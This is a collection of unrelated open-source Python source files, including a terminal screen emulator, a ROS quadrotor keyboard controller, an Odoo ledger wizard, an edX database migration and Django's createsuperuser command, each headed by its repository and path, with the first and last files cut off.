CAN = 24 # Cancel escape sequence.
SUB = 26 # Same as CAN.
ESC = 27 # Introduce a control sequence.
DEL = 127 # Fill character; ignored on input.
SPACE = chr(32) # Space or blank character.
def constrain (n, min, max):
"""This returns a number, n constrained to the min and max bounds. """
if n < min:
return min
if n > max:
return max
return n
class screen:
"""This object maintains the state of a virtual text screen as a
rectangluar array. This maintains a virtual cursor position and handles
scrolling as characters are added. This supports most of the methods needed
by an ANSI text screen. Row and column indexes are 1-based (not zero-based,
like arrays). """
def __init__ (self, r=24,c=80):
"""This initializes a blank scree of the given dimentions."""
self.rows = r
self.cols = c
self.cur_r = 1
self.cur_c = 1
self.cur_saved_r = 1
self.cur_saved_c = 1
self.scroll_row_start = 1
self.scroll_row_end = self.rows
self.w = [ [SPACE] * self.cols for c in range(self.rows)]
def __str__ (self):
"""This returns a printable representation of the screen. The end of
each screen line is terminated by a newline. """
return '\n'.join ([ ''.join(c) for c in self.w ])
def dump (self):
"""This returns a copy of the screen as a string. This is similar to
__str__ except that lines are not terminated with line feeds. """
return ''.join ([ ''.join(c) for c in self.w ])
def pretty (self):
"""This returns a copy of the screen as a string with an ASCII text box
around the screen border. This is similar to __str__ except that it
adds a box. """
top_bot = '+' + '-'*self.cols + '+\n'
return top_bot + '\n'.join(['|'+line+'|' for line in str(self).split('\n')]) + '\n' + top_bot
def fill (self, ch=SPACE):
self.fill_region (1,1,self.rows,self.cols, ch)
def fill_region (self, rs,cs, re,ce, ch=SPACE):
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
for r in range (rs, re+1):
for c in range (cs, ce + 1):
self.put_abs (r,c,ch)
def cr (self):
"""This moves the cursor to the beginning (col 1) of the current row.
"""
self.cursor_home (self.cur_r, 1)
def lf (self):
"""This moves the cursor down with scrolling.
"""
old_r = self.cur_r
self.cursor_down()
if old_r == self.cur_r:
self.scroll_up ()
self.erase_line()
def crlf (self):
"""This advances the cursor with CRLF properties.
The cursor will line wrap and the screen may scroll.
"""
self.cr ()
self.lf ()
def newline (self):
"""This is an alias for crlf().
"""
self.crlf()
def put_abs (self, r, c, ch):
"""Screen array starts at 1 index."""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
ch = str(ch)[0]
self.w[r-1][c-1] = ch
def put (self, ch):
"""This puts a characters at the current cursor position.
"""
self.put_abs (self.cur_r, self.cur_c, ch)
def insert_abs (self, r, c, ch):
"""This inserts a character at (r,c). Everything under
and to the right is shifted right one character.
The last character of the line is lost.
"""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
for ci in range (self.cols, c, -1):
self.put_abs (r,ci, self.get_abs(r,ci-1))
self.put_abs (r,c,ch)
def insert (self, ch):
self.insert_abs (self.cur_r, self.cur_c, ch)
def get_abs (self, r, c):
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
return self.w[r-1][c-1]
def get (self):
self.get_abs (self.cur_r, self.cur_c)
def get_region (self, rs,cs, re,ce):
"""This returns a list of lines representing the region.
"""
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
sc = []
for r in range (rs, re+1):
line = ''
for c in range (cs, ce + 1):
ch = self.get_abs (r,c)
line = line + ch
sc.append (line)
return sc
def cursor_constrain (self):
"""This keeps the cursor within the screen area.
"""
self.cur_r = constrain (self.cur_r, 1, self.rows)
self.cur_c = constrain (self.cur_c, 1, self.cols)
def cursor_home (self, r=1, c=1): # <ESC>[{ROW};{COLUMN}H
self.cur_r = r
self.cur_c = c
self.cursor_constrain ()
def cursor_back (self,count=1): # <ESC>[{COUNT}D (not confused with down)
self.cur_c = self.cur_c - count
self.cursor_constrain ()
def cursor_down (self,count=1): # <ESC>[{COUNT}B (not confused with back)
self.cur_r = self.cur_r + count
self.cursor_constrain ()
def cursor_forward (self,count=1): # <ESC>[{COUNT}C
self.cur_c = self.cur_c + count
self.cursor_constrain ()
def cursor_up (self,count=1): # <ESC>[{COUNT}A
self.cur_r = self.cur_r - count
self.cursor_constrain ()
def cursor_up_reverse (self): # <ESC> M (called RI -- Reverse Index)
old_r = self.cur_r
self.cursor_up()
if old_r == self.cur_r:
self.scroll_up()
def cursor_force_position (self, r, c): # <ESC>[{ROW};{COLUMN}f
"""Identical to Cursor Home."""
self.cursor_home (r, c)
def cursor_save (self): # <ESC>[s
"""Save current cursor position."""
self.cursor_save_attrs()
def cursor_unsave (self): # <ESC>[u
"""Restores cursor position after a Save Cursor."""
self.cursor_restore_attrs()
def cursor_save_attrs (self): # <ESC>7
"""Save current cursor position."""
self.cur_saved_r = self.cur_r
self.cur_saved_c = self.cur_c
def cursor_restore_attrs (self): # <ESC>8
"""Restores cursor position after a Save Cursor."""
self.cursor_home (self.cur_saved_r, self.cur_saved_c)
def scroll_constrain (self):
"""This keeps the scroll region within the screen region."""
if self.scroll_row_start <= 0:
self.scroll_row_start = 1
if self.scroll_row_end > self.rows:
self.scroll_row_end = self.rows
def scroll_screen (self): # <ESC>[r
"""Enable scrolling for entire display."""
self.scroll_row_start = 1
self.scroll_row_end = self.rows
def scroll_screen_rows (self, rs, re): # <ESC>[{start};{end}r
"""Enable scrolling from row {start} to row {end}."""
self.scroll_row_start = rs
self.scroll_row_end = re
self.scroll_constrain()
def scroll_down (self): # <ESC>D
"""Scroll display down one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s+1:e+1] = copy.deepcopy(self.w[s:e])
def scroll_up (self): # <ESC>M
"""Scroll display up one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s:e] = copy.deepcopy(self.w[s+1:e+1])
def erase_end_of_line (self): # <ESC>[0K -or- <ESC>[K
"""Erases from the current cursor position to the end of the current
line."""
self.fill_region (self.cur_r, self.cur_c, self.cur_r, self.cols)
def erase_start_of_line (self): # <ESC>[1K
"""Erases from the current cursor position to the start of the current
line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cur_c)
def erase_line (self): # <ESC>[2K
"""Erases the entire current line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cols)
def erase_down (self): # <ESC>[0J -or- <ESC>[J
"""Erases the screen from the current line down to the bottom of the
screen."""
self.erase_end_of_line ()
self.fill_region (self.cur_r + 1, 1, self.rows, self.cols)
def erase_up (self): # <ESC>[1J
"""Erases the screen from the current line up to the top of the
screen."""
self.erase_start_of_line ()
self.fill_region (self.cur_r-1, 1, 1, self.cols)
def erase_screen (self): # <ESC>[2J
"""Erases the screen with the background color."""
self.fill ()
def set_tab (self): # <ESC>H
"""Sets a tab at the current position."""
pass
def clear_tab (self): # <ESC>[g
"""Clears tab at the current position."""
pass
def clear_all_tabs (self): # <ESC>[3g
"""Clears all tabs."""
pass
# Insert line Esc [ Pn L
# Delete line Esc [ Pn M
# Delete character Esc [ Pn P
# Scrolling region Esc [ Pn(top);Pn(bot) r
|
kimoonkim/spark
|
refs/heads/branch-2.1-kubernetes
|
python/pyspark/mllib/__init__.py
|
123
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
|
18514253911/directive-demo
|
refs/heads/master
|
node_modules/node-gyp/gyp/setup.py
|
2462
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from setuptools import setup
setup(
name='gyp',
version='0.1',
description='Generate Your Projects',
author='Chromium Authors',
author_email='[email protected]',
url='http://code.google.com/p/gyp',
package_dir = {'': 'pylib'},
packages=['gyp', 'gyp.generator'],
entry_points = {'console_scripts': ['gyp=gyp:script_main'] }
)
|
peick/docker-build
|
refs/heads/master
|
tests/raw/import_python_stdlib.py
|
1
|
import sys
version = sys.version
# reference to an existing docker image
Image('test/bary')
|
darshn/sim_test
|
refs/heads/master
|
scripts/keyboard_base_alt.py
|
2
|
import time, sys, math
import pygame
import rospy, tf
from geometry_msgs.msg import Twist, Pose, Quaternion
from gazebo_msgs.msg import ModelStates
from std_srvs.srv import Empty
class BaseKeyboardController:
def __init__(self):
self.gui_init()
self.rospy_init()
rospy.loginfo(rospy.get_name() + ' -- Initialization complete')
def gui_init(self):
pygame.init()
self.screen = pygame.display.set_mode([400, 500])
self.clock = pygame.time.Clock()
background = pygame.Surface(self.screen.get_size())
background = background.convert()
background.fill((250, 250, 250))
font = pygame.font.Font(None, 36)
text = font.render("Keyboard controller", 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
background.blit(text, textpos)
font = pygame.font.Font(None, 30)
text = font.render("Not connected", 1, (200, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
textpos.centery = background.get_rect().centery
background.blit(text, textpos)
self.screen.blit(background, (0, 0))
pygame.display.flip()
def rospy_init(self, rate=100):
rospy.init_node('keyboard_controller', anonymous=True)
self.model_states = rospy.Subscriber(
'/gazebo/model_states',
ModelStates,
self.get_modelstates,
queue_size=10)
rospy.wait_for_service("/gazebo/reset_world")
self.gz_reset = rospy.ServiceProxy("/gazebo/reset_world", Empty)
self.quad_pose = Pose()
self.quad_twist = Twist()
self.rate = rospy.Rate(rate) # in Hz
# Needs to be overridden by child class
self.msg = None
def get_modelstates(self, data):
quad_id = None
for i, name in enumerate(data.name):
if name == 'quadrotor':
quad_id = i
break
if quad_id == None:
return
self.quad_pose = data.pose[quad_id]
self.quad_twist = data.twist[quad_id]
def run(self):
pygame.event.post(pygame.event.Event(pygame.KEYUP, key=pygame.K_0))
pygame.key.set_repeat(500, 30)
dx = dy = dz = 0.08
dax = day = daz = 0.08
twist_events = { # x, y, z, roll, pitch, yaw
pygame.K_w: [dx, 0, 0, 0, 0, 0],
pygame.K_s: [-dx, 0, 0, 0, 0, 0],
pygame.K_a: [0, dy, 0, 0, 0, 0],
pygame.K_d: [0, -dy, 0, 0, 0, 0],
pygame.K_UP: [0, 0, dz, 0, 0, 0],
pygame.K_DOWN: [0, 0, -dz, 0, 0, 0],
pygame.K_o: [0, 0, 0, dax, 0, 0],
pygame.K_u: [0, 0, 0, -dax, 0, 0],
pygame.K_l: [0, 0, 0, 0, day, 0],
pygame.K_j: [0, 0, 0, 0, -day, 0],
pygame.K_LEFT: [0, 0, 0, 0, 0, daz],
pygame.K_RIGHT: [0, 0, 0, 0, 0, -daz],
}
while not rospy.is_shutdown():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_0:
assert self.gz_reset()
self.msg.linear.z = 0
self.msg.linear.y = 0
self.msg.linear.x = 0
self.msg.angular.x = 0
self.msg.angular.y = 0
self.msg.angular.z = 0
elif event.key == pygame.K_UP or event.key == pygame.K_DOWN or event.key == pygame.K_w or event.key == pygame.K_s or event.key == pygame.K_a or event.key == pygame.K_d or event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
x, y, z, ax, ay, az = twist_events[event.key]
self.msg.linear.x += x
self.msg.linear.y += y
self.msg.linear.z += z
self.msg.angular.x += ax
self.msg.angular.y += ay
self.msg.angular.z += az
else:
print('\nInvalid Key \n\n up_arrow and down_arrow for height control (Z-axis) \n a and d for left and right (Y-axis) \n w and s for forward and backward (X-axis) \n left_arrow and right_arrow for yaw')
elif event.type == pygame.KEYUP:
self.msg.linear.z = 0
self.msg.linear.y = 0
self.msg.linear.x = 0
self.msg.angular.z = 0
self.msg.angular.y = 0
self.msg.angular.x = 0
self.draw_now()
self.publisher.publish(self.msg)
self.sleep()
def event_handler(self, key_events):
raise NotImplementedError
def draw_now(self):
self.draw()
self.screen.blit(self.background, (0, 0))
pygame.display.flip()
def draw(self):
self.background = pygame.Surface(self.screen.get_size())
self.background = self.background.convert()
self.background.fill((250, 250, 250))
width = float(self.background.get_rect().width)
self._draw_y = 20
self._draw_x = width / 2
self._draw_text("Quadrotor state", 40)
old_draw_y = self._draw_y
self._draw_x = width / 4
self._draw_text("Position", 30)
self._draw_text("X : %.3f" % self.quad_pose.position.x)
self._draw_text("Y : %.3f" % self.quad_pose.position.y)
self._draw_text("Z : %.3f" % self.quad_pose.position.z)
self._draw_text("Linear velocity", 30)
self._draw_text("X : %.3f" % self.quad_twist.linear.x)
self._draw_text("Y : %.3f" % self.quad_twist.linear.y)
self._draw_text("Z : %.3f" % self.quad_twist.linear.z)
self._draw_y = old_draw_y # On the side
self._draw_x = width * 3 / 4
self._draw_text("Orientation", 30)
old_draw_y = self._draw_y
self._draw_x = width * 5 / 8
yaw, pitch, roll = tf.transformations.euler_from_quaternion(
self.msg_to_quaternion(self.quad_pose.orientation))
self._draw_text("R : %.3f" % math.degrees(roll))
self._draw_text("P : %.3f" % math.degrees(pitch))
self._draw_text("Y : %.3f" % math.degrees(yaw))
self._draw_y = old_draw_y
self._draw_x = width * 7 / 8
self._draw_text("X : %.3f" % self.quad_pose.orientation.x)
self._draw_text("Y : %.3f" % self.quad_pose.orientation.y)
self._draw_text("Z : %.3f" % self.quad_pose.orientation.z)
self._draw_text("W : %.3f" % self.quad_pose.orientation.w)
self._draw_x = width * 3 / 4
self._draw_text("Angular velocity", 30)
self._draw_text("X : %.3f" % self.quad_twist.angular.x)
self._draw_text("Y : %.3f" % self.quad_twist.angular.y)
self._draw_text("Z : %.3f" % self.quad_twist.angular.z)
def _draw_text(self, text, font_size=20, x=None, y=None):
x = x or self._draw_x
y = y or self._draw_y
font = pygame.font.Font(None, font_size)
text = font.render(text, 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = x
textpos.centery = y
self.background.blit(text, textpos)
self._draw_y += font_size + 5
@staticmethod
def msg_to_quaternion(q):
assert type(q) == Quaternion
# Quaternions in TF are normally SXYZ form
return [q.w, q.x, q.y, q.z]
def sleep(self):
self.rate.sleep()
|
sthenc/bss_tester
|
refs/heads/master
|
stari_kodovi/fft_test.py
|
1
|
#!/usr/bin/python
import scipy
import scipy.fftpack
import pylab
from scipy import pi
t = scipy.linspace(0,120,4000)
acc = lambda t: 10*scipy.cos(2*pi*10*t) #+ 5*scipy.sin(2*pi*8.0*t) #+ 2*scipy.random.random(len(t))
signal = acc(t)
FFT = abs(scipy.fft(signal))
freqs = scipy.fftpack.fftfreq(signal.size, t[1]-t[0])
pylab.subplot(211)
pylab.plot(t, signal)
pylab.subplot(212)
pylab.plot(freqs[0:len(freqs)/2],FFT[0:len(FFT)/2]) #20*scipy.log10(FFT),'x')
pylab.show()
|
odoousers2014/odoo
|
refs/heads/master
|
addons/account/wizard/account_report_partner_ledger.py
|
8
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_partner_ledger(osv.osv_memory):
"""
This wizard will provide the partner Ledger report by periods, between any two dates.
"""
_name = 'account.partner.ledger'
_inherit = 'account.common.partner.report'
_description = 'Account Partner Ledger'
_columns = {
'initial_balance': fields.boolean('Include Initial Balances',
help='If you selected to filter by date or period, this field allow you to add a row to display the amount of debit/credit/balance that precedes the filter you\'ve set.'),
'filter': fields.selection([('filter_no', 'No Filters'), ('filter_date', 'Date'), ('filter_period', 'Periods'), ('unreconciled', 'Unreconciled Entries')], "Filter by", required=True),
'page_split': fields.boolean('One Partner Per Page', help='Display Ledger Report with One partner per page'),
'amount_currency': fields.boolean("With Currency", help="It adds the currency column on report if the currency differs from the company currency."),
'journal_ids': fields.many2many('account.journal', 'account_partner_ledger_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
_defaults = {
'initial_balance': False,
'page_split': False,
}
def onchange_filter(self, cr, uid, ids, filter='filter_no', fiscalyear_id=False, context=None):
res = super(account_partner_ledger, self).onchange_filter(cr, uid, ids, filter=filter, fiscalyear_id=fiscalyear_id, context=context)
if filter in ['filter_no', 'unreconciled']:
if filter == 'unreconciled':
res['value'].update({'fiscalyear_id': False})
res['value'].update({'initial_balance': False, 'period_from': False, 'period_to': False, 'date_from': False ,'date_to': False})
return res
def _print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data = self.pre_print_report(cr, uid, ids, data, context=context)
data['form'].update(self.read(cr, uid, ids, ['initial_balance', 'filter', 'page_split', 'amount_currency'])[0])
if data['form'].get('page_split') is True:
return self.pool['report'].get_action(cr, uid, [], 'account.report_partnerledgerother', data=data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_partnerledger', data=data, context=context)
|
appleseedhq/cortex
|
refs/heads/master
|
python/IECoreMaya/FnOpHolder.py
|
5
|
##########################################################################
#
# Copyright (c) 2008-2011, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from FnParameterisedHolder import FnParameterisedHolder
import maya.cmds
class FnOpHolder( FnParameterisedHolder ) :
def __init__( self, objectOrObjectName ) :
FnParameterisedHolder.__init__( self, objectOrObjectName )
## Creates a new node holding a new instance of the op of the specified
# type and version. Returns an FnOpHolder instance attached to this node.
@staticmethod
def create( nodeName, opType, opVersion=None ) :
holder = maya.cmds.createNode( "ieOpHolderNode", name=nodeName, skipSelect=True )
fnOH = FnOpHolder( holder )
# not asking for undo, as this way we end up with a single undo action which will
# delete the node. otherwise we get two undo actions, one to revert the setParameterised()
# one to revert the createNode().
fnOH.setOp( opType, opVersion, undoable=False )
return fnOH
## Convenience function which calls setParameterised( opType, opVersion, "IECORE_OP_PATHS" )
def setOp( self, opType, opVersion=None, undoable=True ) :
self.setParameterised( opType, opVersion, "IECORE_OP_PATHS", undoable )
## Convenience function which returns getParameterised()[0]
def getOp( self ) :
return self.getParameterised()[0]
## Returns the maya node type that this function set operates on
@classmethod
def _mayaNodeType( cls ):
return "ieOpHolderNode"
|
agentxan/nzbToMedia
|
refs/heads/master
|
libs/jaraco/windows/api/environ.py
|
4
|
import ctypes.wintypes
SetEnvironmentVariable = ctypes.windll.kernel32.SetEnvironmentVariableW
SetEnvironmentVariable.restype = ctypes.wintypes.BOOL
SetEnvironmentVariable.argtypes = [ctypes.wintypes.LPCWSTR]*2
GetEnvironmentVariable = ctypes.windll.kernel32.GetEnvironmentVariableW
GetEnvironmentVariable.restype = ctypes.wintypes.BOOL
GetEnvironmentVariable.argtypes = [
ctypes.wintypes.LPCWSTR,
ctypes.wintypes.LPWSTR,
ctypes.wintypes.DWORD,
]
|
xfumihiro/powerline
|
refs/heads/develop
|
powerline/matchers/vim/__init__.py
|
21
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from powerline.bindings.vim import vim_getbufoption, buffer_name
def help(matcher_info):
return str(vim_getbufoption(matcher_info, 'buftype')) == 'help'
def cmdwin(matcher_info):
name = buffer_name(matcher_info)
return name and os.path.basename(name) == b'[Command Line]'
def quickfix(matcher_info):
return str(vim_getbufoption(matcher_info, 'buftype')) == 'quickfix'
|
abdoosh00/edx-rtl-final
|
refs/heads/master
|
lms/djangoapps/shoppingcart/migrations/0002_auto__add_field_paidcourseregistration_mode.py
|
182
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PaidCourseRegistration.mode'
db.add_column('shoppingcart_paidcourseregistration', 'mode',
self.gf('django.db.models.fields.SlugField')(default='honor', max_length=50),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PaidCourseRegistration.mode'
db.delete_column('shoppingcart_paidcourseregistration', 'mode')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
sivaprakashniet/push_pull
|
refs/heads/master
|
p2p/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
131
|
"""
Management utility to create superusers.
"""
from __future__ import unicode_literals
import getpass
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.management import get_default_username
from django.core import exceptions
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS
from django.utils.encoding import force_str
from django.utils.six.moves import input
from django.utils.text import capfirst
class NotRunningInTTYException(Exception):
pass
